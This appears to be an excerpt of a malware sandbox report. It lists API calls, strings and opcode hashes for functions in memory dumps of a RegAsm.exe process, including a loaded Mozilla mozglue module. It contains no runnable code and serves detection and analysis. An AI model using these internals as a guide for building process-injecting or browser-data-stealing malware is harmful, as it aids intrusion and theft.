Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CBC9

Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1

malloc.MSVCRT ref: 0041CC06

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8

Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6C756C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C756CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C756D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C756D26

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C756D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C756D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C756D73
free.MOZGLUE(00000000), ref: 6C756D80
CertGetNameStringW.CRYPT32 ref: 6C756DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C756DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C756DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C756DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C756E10
CryptMsgClose.CRYPT32(00000000), ref: 6C756E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C756E34
CreateFileW.KERNEL32 ref: 6C756EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C756F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C756F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C75709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C757103
free.MOZGLUE(00000000), ref: 6C757153
CloseHandle.KERNEL32(?), ref: 6C757176
__Init_thread_footer.LIBCMT ref: 6C757209
__Init_thread_footer.LIBCMT ref: 6C75723A
__Init_thread_footer.LIBCMT ref: 6C75726B
__Init_thread_footer.LIBCMT ref: 6C75729C
__Init_thread_footer.LIBCMT ref: 6C7572DC
__Init_thread_footer.LIBCMT ref: 6C75730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C7573C2
VerSetConditionMask.NTDLL ref: 6C7573F3
VerSetConditionMask.NTDLL ref: 6C7573FF
VerSetConditionMask.NTDLL ref: 6C757406
VerSetConditionMask.NTDLL ref: 6C75740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C75741A
moz_xmalloc.MOZGLUE(?), ref: 6C75755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C757568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C757585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C757598
free.MOZGLUE(00000000), ref: 6C7575AC

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

Strings

SHA256, xrefs: 6C756EC0
(, xrefs: 6C75768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C7572C8
wintrust.dll, xrefs: 6C7572CD

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 3b03f03268a15a4c0df50450a1858a2bbb7188d4a31b5343c0bd532602630220
Instruction ID: c9efdc1c59cf4c0a1ce5443dd95a3d2277f7737d8de05fbe047fae495d65d0ee
Opcode Fuzzy Hash: 3b03f03268a15a4c0df50450a1858a2bbb7188d4a31b5343c0bd532602630220
Instruction Fuzzy Hash: 4E52D771A002159FEB21DF25CE88BAA77BCFB45714F5081A9E909A7640DF30AF94CF91

Function 6C78F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C78F09B

Part of subcall function 6C765B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
Part of subcall function 6C765B50: EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
Part of subcall function 6C765B50: LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
Part of subcall function 6C765B50: GetTickCount64.KERNEL32 ref: 6C765BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C78F0AC

Part of subcall function 6C765C50: GetTickCount64.KERNEL32 ref: 6C765D40
Part of subcall function 6C765C50: EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C765D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C78F0BE

Part of subcall function 6C765C50: __aulldiv.LIBCMT ref: 6C765DB4
Part of subcall function 6C765C50: LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C765DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C78F155
GetCurrentThreadId.KERNEL32 ref: 6C78F1E0
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F1ED
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F212
GetCurrentThreadId.KERNEL32 ref: 6C78F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C78F248
GetCurrentThreadId.KERNEL32 ref: 6C78F2AE
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F2BB
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F2F8

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78F350
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F35D
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F381
GetCurrentThreadId.KERNEL32 ref: 6C78F398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F3A0
GetCurrentThreadId.KERNEL32 ref: 6C78F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F491

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C78F3CF

Part of subcall function 6C78F070: GetCurrentThreadId.KERNEL32 ref: 6C78F440
Part of subcall function 6C78F070: AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F44D
Part of subcall function 6C78F070: ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C78F4A8
GetCurrentThreadId.KERNEL32 ref: 6C78F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F561
GetCurrentThreadId.KERNEL32 ref: 6C78F577
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F585
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6C78F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C78F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C78F56A
[I %d/%d] profiler_resume, xrefs: 6C78F239

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 8cfcd016fa87c6ad7e2c044faa41a6269881c3f923b7cccab2493a3aa5dc73c8
Instruction ID: 6f52e595270f9fe0881c55943fed368b44f365c418ff3b0803dac7c3d7d993f6
Opcode Fuzzy Hash: 8cfcd016fa87c6ad7e2c044faa41a6269881c3f923b7cccab2493a3aa5dc73c8
Instruction Fuzzy Hash: 8DD10931B052069FDB009F78D54C7AA77F8EB46328F14453AFA6983B81DB749B04C7A6

Function 6C7564C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C7564DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C7564F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C756505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C756518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C75652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C75671C
GetCurrentProcess.KERNEL32 ref: 6C756724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C75672F
GetCurrentProcess.KERNEL32 ref: 6C756759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C756764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C756A80
GetSystemInfo.KERNEL32(?), ref: 6C756ABE
__Init_thread_footer.LIBCMT ref: 6C756AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C756AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C756AF7

Strings

user32.dll, xrefs: 6C756526
nvd3d9wrap.dll, xrefs: 6C756500
detoured.dll, xrefs: 6C7564DA
_etoured.dll, xrefs: 6C7564ED
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C756798
nvdxgiwrap.dll, xrefs: 6C756513

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 458713b11616144a2bf6325f2f785a592cb36cff7f86f1f63096b75e0b9b0fbe
Instruction ID: 4096ec05f7490cea25d8069db6c54915ee07951c2439fd57d3a115c1c4d5b614
Opcode Fuzzy Hash: 458713b11616144a2bf6325f2f785a592cb36cff7f86f1f63096b75e0b9b0fbe
Instruction Fuzzy Hash: DAF1F3709052199FDB20CF25CE88B9AB7B4AF45318F5442E9E809A7741EB31AF94CF91

Function 6C78E2F0 Relevance: 35.5, APIs: 13, Strings: 7, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6C78E2A6), ref: 6C78E35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C78E2A6), ref: 6C78E386
GetCurrentThreadId.KERNEL32 ref: 6C78E3E4
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6C78E4AB
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E4F5
GetCurrentThreadId.KERNEL32 ref: 6C78E577
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E584
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E5DE
